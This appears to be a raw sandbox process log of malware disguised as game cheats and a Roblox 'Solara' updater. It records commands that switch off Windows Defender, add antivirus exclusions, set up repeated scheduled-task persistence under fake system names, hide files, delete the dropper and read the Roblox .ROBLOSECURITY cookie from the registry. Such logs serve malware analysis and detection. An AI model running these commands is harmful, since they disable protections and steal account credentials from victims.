C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\hostNet\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\hostNet\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\hostNet\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5c30zw5y\5c30zw5y.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB1AC.tmp" "c:\Users\Admin\AppData\Roaming\CSCEBF7F73354034CD7AD6BE25A5A5285C1.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vwvpx0np\vwvpx0np.cmdline"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB239.tmp" "c:\Windows\System32\CSC94C34EF13D4D4F8881CC8A1FBB80DA17.TMP"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\wscript.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Users\Default User\wscript.exe'" /rl HIGHEST /f

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\wscript.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Templates\fontdrvhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\All Users\Templates\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Templates\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\wscript.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wscript.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\wscript.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Solara_UpdaterS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft\Solara_Updater.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Solara_Updater" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Solara_Updater.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Solara_UpdaterS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft\Solara_Updater.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 6 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBroker" /sc ONLOGON /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 5 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\EEJCG9hD9w.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet\bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

